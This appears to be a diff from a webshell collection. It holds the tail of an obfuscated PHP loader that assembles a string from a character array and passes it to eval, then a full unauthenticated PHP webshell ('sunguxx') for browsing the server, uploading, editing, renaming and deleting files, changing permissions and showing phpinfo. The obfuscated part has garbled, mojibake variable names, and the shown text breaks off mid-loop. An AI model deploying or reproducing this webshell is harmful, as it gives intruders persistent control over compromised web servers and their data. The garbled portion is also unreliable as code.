+    $<24><><EFBFBD><EFBFBD><EFBFBD>口<EFBFBD><E58FA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>夏<EFBFBD><E5A48F><EFBFBD><EFBFBD><EFBFBD>玶<EFBFBD>䬅<EFBFBD><E4AC85><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[9] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[69] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[42] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[16] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[25] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[71];
+    $<24><>邜<EFBFBD><E9829C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>巖<EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[15] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[69] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[25] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[3] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39];
+    $<24><><EFBFBD>牂<EFBFBD><E78982><EFBFBD><EFBFBD><EFBFBD><EFBFBD>殻<EFBFBD><E6AEBB><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[20] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[18] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[0] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[37] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63];
+    $<24><><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD>兰<EFBFBD><E585B0><EFBFBD><EFBFBD>最<EFBFBD><E69C80>䘟<EFBFBD><E4989F>谯<EFBFBD><E8B0AF><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[23] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[80] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[47] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[60] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[54] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[74] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[40];
+    $<24><>嬉<EFBFBD><E5AC89><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>稬熺<E7A8AC><E786BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>剤<EFBFBD>磺嬋儴<E5AC8B>叙<EFBFBD><E58F99>躺<EFBFBD><E8BABA><EFBFBD><EFBFBD><EFBFBD> .
+        $<24><><EFBFBD><EFBFBD>箮<EFBFBD><E7AEAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .
+        $<24><>邜<EFBFBD><E9829C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>巖<EFBFBD> .
+        $<24><><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD>兰<EFBFBD><E585B0><EFBFBD><EFBFBD>最<EFBFBD><E69C80>䘟<EFBFBD><E4989F>谯<EFBFBD><E8B0AF><EFBFBD> .
+        $<24><><EFBFBD><EFBFBD><EFBFBD>口<EFBFBD><E58FA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>夏<EFBFBD><E5A48F><EFBFBD><EFBFBD><EFBFBD>玶<EFBFBD>䬅<EFBFBD><E4AC85><EFBFBD> .
+        $<24><><EFBFBD>牂<EFBFBD><E78982><EFBFBD><EFBFBD><EFBFBD><EFBFBD>殻<EFBFBD><E6AEBB><EFBFBD> .
+        '$<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>朙趣<E69C99>䉆<EFBFBD><E48986><EFBFBD><EFBFBD>机<EFBFBD><E69CBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[83];
+    return EvAl($<24><>嬉<EFBFBD><E5AC89><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>稬熺<E7A8AC><E786BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>);
+} ?>

upsi1on/webshell/sungux/decrypt.php

@@ -0,0 +1,745 @@
+<?php
+error_reporting(0);
+echo "
+<style>
+    body {
+        color: Gray;
+        background: #353535;
+        font-weight: Bold;
+        font-family: Arial;
+        font-size: 14px;
+    }
+
+    input[id=one] {
+        background: Transparent;
+        color: Gray;
+        font-weight: Bold;
+        border: #353535 1px solid;
+    }
+
+    input[id=textinput] {
+        border: 1px #353535 solid;
+        background: #353535;
+        color: Gray;
+        font-weight: Bold;
+        width: 50%;
+    }
+
+    input[type=submit] {
+        background: Transparent;
+        color: Gray;
+        font-weight: Bold;
+        border: #353535 1px solid;
+    }
+
+    input[type=file] , [id=three] {
+        width: 30%;
+        border: 1px Gray solid;
+        border-radius: 10px;
+        background: #353535;
+        color: Gray;
+    }
+
+    input[id=two] {
+        margin-left: 70px;
+    }
+
+    a {
+        text-decoration: none;
+        color: Gray;
+    }
+
+    table {
+        font-weight: Bold;
+    }
+
+    textarea {
+        width: 90%;
+        height: 50%;
+    }
+
+    .iclass {
+        margin-left: 40px;
+    }
+</style>
+
+";
+
+if (isset($_POST["phpinfo"])) {
+    echo "<a href='?path=".$_GET["path"]."'>back</a>";
+    phpinfo();
+    exit;
+}
+
+echo "<pre><center>
+.d8888b  888  888 88888b.   .d88b.  888  888 888  888
+88K      888  888 888 '88b d88P'88b 888  888 `Y8bd8P'
+'Y8888b. 888  888 888  888 888  888 888  888   X88K  
+     X88 Y88b 888 888  888 Y88b 888 Y88b 888 .d8''8b.
+d88888P'  'Y88888 888  888  'Y88888  'Y88888 888  888
+                                888                  
+                           Y8b d88P                  
+                            'Y88P'                   
+</center></pre>";
+
+$path = base64_decode($_GET["path"]);
+
+if (is_dir($path)) {
+    if ($path !== "/") {
+        $slash = "/";
+    } else {
+        $slash = "";
+    }
+} else {
+    $checkslash = substr($path, 2);
+    if (is_dir($checkslash)) {
+        if ($checkslash !== "/") {
+            $slash = "/";
+        } else {
+            $slash = "";
+        }
+    } else {
+        if (is_file($checkslash)) {
+            if ($checkslash !== "/") {
+                $slash = "/";
+            } else {
+                $slash = "";
+            }
+        }
+    }
+}
+
+if (!is_dir($path)) {
+    if (substr($path, 0, 2) == "#E") {
+        if (!is_file(substr($path, 2))) {
+            header("Location: ?path=".base64_encode(__DIR__)."");
+        }
+    } else {
+        if (substr($path, 0, 2) == "#R") {
+            if (!is_file(substr($path, 2))) {
+                if (!is_dir(substr($path, 2))) {
+                    header("Location: ?path=".base64_encode(__DIR__)."");
+                }
+            }
+        } else {
+            if (substr($path, 0, 2) == "#D") {
+                if (!is_file(substr($path, 2))) {
+                    if (!is_dir(substr($path, 2))) {
+                        header("Location: ?path=".base64_encode(__DIR__)."");
+                    }
+                }
+            } else {
+                if (substr($path, 0, 2) == "#C") {
+                    if (!is_file(substr($path, 2))) {
+                        if (!is_dir(substr($path, 2))) {
+                            header("Location: ?path=".base64_encode(__DIR__)."");
+                        }
+                    }
+                } else {
+		    header("Location: ?path=".base64_encode(__DIR__)."");
+		}
+            }
+        }
+    }
+}
+echo "<form action='' method='post' enctype='multipart/form-data'>";
+
+if (isset($_POST["move_upload"])) {
+    if (strpos($_POST["uptopath"], "..") !== FALSE) {
+        echo "
+        <script>
+        alert('failed');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+    $fileName = $_FILES["file"]["name"];
+    $tmpName = $_FILES["file"]["tmp_name"];
+    $upload = $_POST["uptopath"].$slash.$fileName;
+    if (is_file($upload)) {
+        echo "
+        <script>
+        alert('file name already exists');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    } else {
+        if (move_uploaded_file($tmpName, $upload)) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+    }
+}
+
+if (isset($_POST["crf"])) {
+    if (is_dir($_POST["pathfolder"])) {
+        if (strpos($_POST["pathfolder"], "..") !== FALSE) {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+        if (strpos($_POST["foldername"], "/") !== FALSE) {
+            echo "
+            <script>
+            alert('use a different name');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        } else {
+            $o2 = explode("/", $_POST["pathfolder"]);
+            $o2 = implode("/", $o2);
+            $o2 = $o2.$slash.$_POST["foldername"];
+            if (!is_dir($o2)) {
+                if (mkdir($o2)) {
+                    echo "
+                    <script>
+                    alert('successfully');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                } else {
+                    echo "
+                    <script>
+                    alert('failed');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('folder name alredy exists');
+                document.location.href = '?path=".$_GET["path"]."';
+                </script>
+                ";
+            }
+        }
+    } else {
+        echo "
+        <script>
+        alert('directory not found');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+}
+
+if (isset($_POST["crfl"])) {
+    if (strpos($_POST["pathfile"], "..") == FALSE) {
+        if (is_dir($_POST["pathfile"])) {
+            $slashcheck = explode("/", $_POST["pathfile"]);
+            $slashcheck = implode("/", $slashcheck).$slash;
+            if (strpos($_POST["filename"], "/") == FALSE) {
+                $filePath9 = $slashcheck.$_POST["filename"];
+                if (!is_file($filePath9)) {
+                    $createFile = fopen($filePath9, "x");
+                    if ($createFile) {
+                        echo "
+                        <script>
+                        alert('successfully');
+                        document.location.href = '?path=".$_GET["path"]."';
+                        </script>
+                        ";
+                    } else {
+                        echo "
+                        <script>
+                        alert('failed');
+                        document.location.href = '?path=".$_GET["path"]."';
+                        </script>
+                        ";
+                    }
+                } else {
+                    echo "
+                    <script>
+                    alert('file name already exists');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('use a different name');
+                document.location.href = '?path=".$_GET["path"]."';
+                </script>
+                ";
+            }
+        } else {
+            echo "
+            <script>
+            alert('directory not found');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+    } else {
+        echo "
+        <script>
+        alert('failed');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+}
+
+if (substr($path, 0, 2) == "#E") {
+    echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'><hr color='Gray'><center>";
+    $back = dirname(substr($path, 2));
+    if (isset($_POST["save_edit"])) {
+        $delta = substr($path, 2);
+        $editz = fopen($delta, "w");
+        if (fwrite($editz, $_POST["edit_data"])) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            "; fclose($editz);
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            "; fclose($editz);
+        }
+    }
+    if (filesize(substr($path, 2)) == 0) {
+        echo "
+        <textarea name='edit_data'></textarea><hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a>
+        <input type='submit' name='save_edit' value='save' id='two'>
+        ";
+    } else {
+        $textareaValue = fopen(substr($path, 2), "r");
+        $textareaValue = fread($textareaValue, filesize(substr($path, 2)));
+        $textareaValue = htmlspecialchars($textareaValue);
+        echo "
+        <textarea name='edit_data'>".$textareaValue."</textarea>
+        <hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='save_edit' value='save' id='two'>
+        ";
+        fclose($textareaValue);
+    }
+    exit;
+}
+
+if (substr($path, 0, 2) == "#R") {
+    echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'>";
+    $delta = substr($path, 2);
+    $back = dirname($delta);
+    if (isset($_POST["submit_rename"])) {
+        $alphacheck = dirname($delta).$slash.$_POST["rename"];
+        if (!is_dir($alphacheck)) {
+            if (!is_file($alphacheck)) {
+                if (rename($delta, $alphacheck)) {
+                    echo "
+                    <script>
+                    alert('successfully');
+                    document.location.href = '?path=".base64_encode($back)."';
+                    </script>
+                    ";
+                } else {
+                    echo "
+                    <script>
+                    alert('failed');
+                    document.location.href = '?path=".base64_encode($back)."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('file name alredy exists');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        } else {
+            echo "
+            <script>
+            alert('folder name alredy exists');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            ";
+        }
+    }
+    echo "
+    <input type='text' id='three' autocomplete='off' name='rename' value='".basename($delta)."'><hr color='Gray'><center>
+    <a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='submit_rename' value='rename' id='two'>
+    ";
+    exit;
+}
+
+if (substr($path, 0, 2) == "#D") {
+    $delta = substr($path, 2);
+    $back = dirname($delta);
+
+    if (isset($_POST["submit_delete"])) {
+        if (is_dir($delta)) {
+            if (rmdir($delta)) {
+                echo "
+                <script>
+                alert('successfully');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            } else {
+                echo "
+                <script>
+                alert('failed');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        } else {
+            if (unlink($delta)) {
+                echo "
+                <script>
+                alert('successfully');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            } else {
+                echo "
+                <script>
+                alert('failed');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        }
+    }
+
+    if (is_dir($delta)) {
+        $cat = "folder";
+    } else {
+        $cat = "file";
+    }
+    echo "path : <input type='text' readonly='readonly' value='".$delta."' id='one' style='width: 80%;'><br>
+    name : <input type='text' readonly='readonly' value='".basename($delta)."' id='one' style='width: 80%;'><br>
+    are you sure to permanently delete this ".$cat."?<hr color='Gray'><center>
+    <a href='?path=".base64_encode($back)."'>no</a><input type='submit' name='submit_delete' value='yes' id='two'>
+    ";
+    exit;
+}
+
+if (substr($path, 0, 2) == "#C") {
+
+    $home = dirname(substr($path, 2)); $home = base64_encode($home);
+    $perms = substr(sprintf('%o',fileperms(substr($path, 2))),-3);
+
+    $chv = fileperms(substr($path, 2));
+    $a = ($chv & 00400) ? ' checked' : '';
+    $b = ($chv & 00040) ? ' checked' : '';
+    $c = ($chv & 00004) ? ' checked' : '';
+    $d = ($chv & 00200) ? ' checked' : '';
+    $e = ($chv & 00020) ? ' checked' : '';
+    $f = ($chv & 00002) ? ' checked' : '';
+    $g = ($chv & 00100) ? ' checked' : '';
+    $h = ($chv & 00010) ? ' checked' : '';
+    $i = ($chv & 00001) ? ' checked' : '';
+
+    if (isset($_POST["submit_chmod"])) {
+        $chmode = 0;
+        if (!empty($_POST['ra'])) {
+            $chmode |= 0400;
+        }
+        if (!empty($_POST['wa'])) {
+            $chmode |= 0200;
+        }
+        if (!empty($_POST['ea'])) {
+            $chmode |= 0100;
+        }
+        if (!empty($_POST['rb'])) {
+            $chmode |= 0040;
+        }
+        if (!empty($_POST['wb'])) {
+            $chmode |= 0020;
+        }
+        if (!empty($_POST['eb'])) {
+            $chmode |= 0010;
+        }
+        if (!empty($_POST['rc'])) {
+            $chmode |= 0004;
+        }
+        if (!empty($_POST['wc'])) {
+            $chmode |= 0002;
+        }
+        if (!empty($_POST['ec'])) {
+            $chmode |= 0001;
+        }
+        if (chmod(substr($path, 2), $chmode)) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".$home."';
+            </script>
+            ";
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$home."';
+            </script>
+            ";
+        }
+    }
+
+    echo "
+        <hr color='Gray'><form action='' method='post'>
+        <input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 100%'>
+        <hr color='Gray'>
+        <table width='100%'>
+            <tr>
+                <th class='chmodd'>Permissions</th>
+                <th class='chmodd'>Owner</th>
+                <th class='chmodd'>Group</th>
+                <th class='chmodd'>Other</th>
+            </tr>
+            <tr>
+                <td>Read</td>
+                <td><center><input type='checkbox' name='ra' value='1' ".$a."></center></td>
+                <td><center><input type='checkbox' name='rb' value='1' ".$b."></center></td>
+                <td><center><input type='checkbox' name='rc' value='1' ".$c."></center></td>
+            </tr>
+            <tr>
+                <td>Write</td>
+                <td><center><input type='checkbox' name='wa' value='1' ".$d."></center></td>
+                <td><center><input type='checkbox' name='wb' value='1' ".$e."></center></td>
+                <td><center><input type='checkbox' name='wc' value='1' ".$f."></center></td>
+            </tr>
+            <tr>
+                <td>Execute</td>
+                <td><center><input type='checkbox' name='ea' value='1' ".$g."></center></td>
+                <td><center><input type='checkbox' name='eb' value='1' ".$h."></center></td>
+                <td><center><input type='checkbox' name='ec' value='1' ".$i."></center></td>
+            </tr>
+        </table><hr color='Gray'>
+        <center><a href='?path=".$home."'>cancel</a>
+        <input type='submit' name='submit_chmod' value='change' id='two'></center>
+    "; exit;
+}
+
+if (isset($_POST["upload"])) {
+    echo "
+    upload to : <input type='text' autocomplete='off' id='textinput' name='uptopath' value='".$path.$slash."' width='100px'><br>
+    <input type='file' name='file'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='move_upload' value='upload' id='two'>
+    "; exit;
+}
+
+if (isset($_POST["create_folder"])) {
+    echo "
+    create on : <input type='text' autocomplete='off' id='textinput' name='pathfolder' value='".$path.$slash."' width='100px'><br>
+    <input type='text' autocomplete='off' name='foldername' id='three' placeholder='folder name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='crf' value='create' id='two'>
+    "; exit;
+}
+
+if (isset($_POST["create_file"])) {
+    echo "
+    create on : <input type='text' autocomplete='off' id='textinput' name='pathfile' value='".$path.$slash."' width='100px'><br>
+    <input type='text' autocomplete='off' name='filename' id='three' placeholder='file name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='crfl' value='create' id='two'>
+    "; exit;
+}
+
+echo "
+<input type='text' readonly='readonly' id='one' value='".$path.$slash."' style='width: 100%;'><hr color='Gray'>
+<input type='submit' name='upload' value='upload'>
+<input type='submit' name='create_folder' value='+ folder'>
+<input type='submit' name='create_file' value='+ file'>
+<input type='submit' name='phpinfo' value='phpinfo'>";
+
+echo "<table width='100%'>";
+
+if ($path !== "/") {
+    $alpha = dirname($path);
+    echo "<tr><td width='2%'><div class='iclass'><a href='?path=".base64_encode($alpha)."'>..</a></div></td></tr>";
+}
+
+$scanPath = scandir($path);
+$scanPath = array_diff($scanPath,array('.','..'));
+$scanPath = array_values($scanPath);
+
+for ($i = 0; $i < count($scanPath); $i++) {
+    $iota = $scanPath[$i];
+    if (is_dir($path.$slash.$iota)) {
+
+        $result = filemtime($path.$slash.$iota); $result = getdate($result);
+        $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+        $three = strlen($result["year"]); $four = strlen($result["hours"]);
+        $five = strlen($result["minutes"]);
+        if ($one == "1") {
+            $result["mday"] = "0".$result["mday"];
+        } if ($two == "1") {
+            $result["mon"] = "0".$result["mon"];
+        } if ($three == "1") {
+            $result["year"] = "0".$result["year"];
+        } if ($four == "1") {
+            $result["hours"] = "0".$result["hours"];
+        } if ($five == "1") {
+            $result["minutes"] = "0".$result["minutes"];
+        } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+        echo "<tr><td width='2%'><div class='iclass'>D</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+        <td width='10%'><center>-</center></td><td width='20%'><center>".$result."</center></td>
+        <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+        <td style='width: 5%'><center><a title='open ".$iota."' href='?path=".base64_encode($path.$slash.$iota)."'>O</a>
+        <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+        <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+        </tr>";
+    }
+}
+
+for ($i = 0; $i < count($scanPath); $i++) {
+
+    $iota = $scanPath[$i];
+    $pathType = mime_content_type($path.$slash.$iota);
+    $pathType = explode("/", $pathType);
+    $sizeA = filesize($path.$slash.$iota);
+    $filesize = $sizeA;
+    $sizeks = "B";
+    if ($sizeA > 1024) {
+        $filesize = round($sizeA / 1024);
+        $sizeks = "KB";
+    }  if ($sizeA > 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024);
+        $sizeks = "MB";
+    } if ($sizeA > 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024);
+        $sizeks = "GB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "TB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "PB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "EB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "ZB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024  * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "YB";
+    }
+
+    $result = filemtime($path.$slash.$iota); $result = getdate($result);
+    $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+    $three = strlen($result["year"]); $four = strlen($result["hours"]);
+    $five = strlen($result["minutes"]);
+    if ($one == "1") {
+        $result["mday"] = "0".$result["mday"];
+    } if ($two == "1") {
+        $result["mon"] = "0".$result["mon"];
+    } if ($three == "1") {
+        $result["year"] = "0".$result["year"];
+    } if ($four == "1") {
+        $result["hours"] = "0".$result["hours"];
+    } if ($five == "1") {
+        $result["minutes"] = "0".$result["minutes"];
+    } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+    if ($pathType[0] == "text") {
